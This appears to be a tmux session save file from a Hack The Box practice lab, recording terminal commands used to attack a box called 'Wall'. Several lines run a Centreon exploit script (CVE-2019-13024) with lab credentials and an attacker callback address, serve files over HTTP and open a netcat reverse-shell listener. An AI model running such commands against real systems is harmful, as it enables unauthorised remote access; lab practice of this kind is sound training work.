pane	HTB	0	:VPN	0	:	0	:/root/HTB/Boxes/Wall	1	openvpn	:openvpn /root/HTB/VPN/vGsec
pane	HTB	1	:enum	0	:-	0	:/root/HTB/Boxes/Wall	0	vim	:vim cve-2019-13024.py
pane	HTB	1	:enum	0	:-	1	:/root/HTB/Boxes/Wall	0	python3	:python3 cve-2019-13024.py http://10.10.10.157/centreon/ admin password1 10.10.14.23 6969
pane	HTB	1	:enum	0	:-	2	:/root/HTB/Boxes/Wall/www	1	python3	:python3 -m http.server 80
pane	HTB	2	:[tmux]	1	:*Z	0	:/root/HTB/Boxes/Wall	0	nc	:nc -lvnp 6969
pane	HTB	2	:[tmux]	1	:*Z	1	:/root/HTB/Boxes/Wall/linpe	1	zsh	:
window	HTB	0	0	:	b79d,282x52,0,0,0
window	HTB	1	0	:-	3750,282x52,0,0{141x52,0,0,1,140x52,142,0[140x26,142,0,5,140x25,142,27,7]}
window	HTB	2	1	:*Z	9f6c,282x52,0,0{141x52,0,0,10,140x52,142,0,11}
state	HTB	
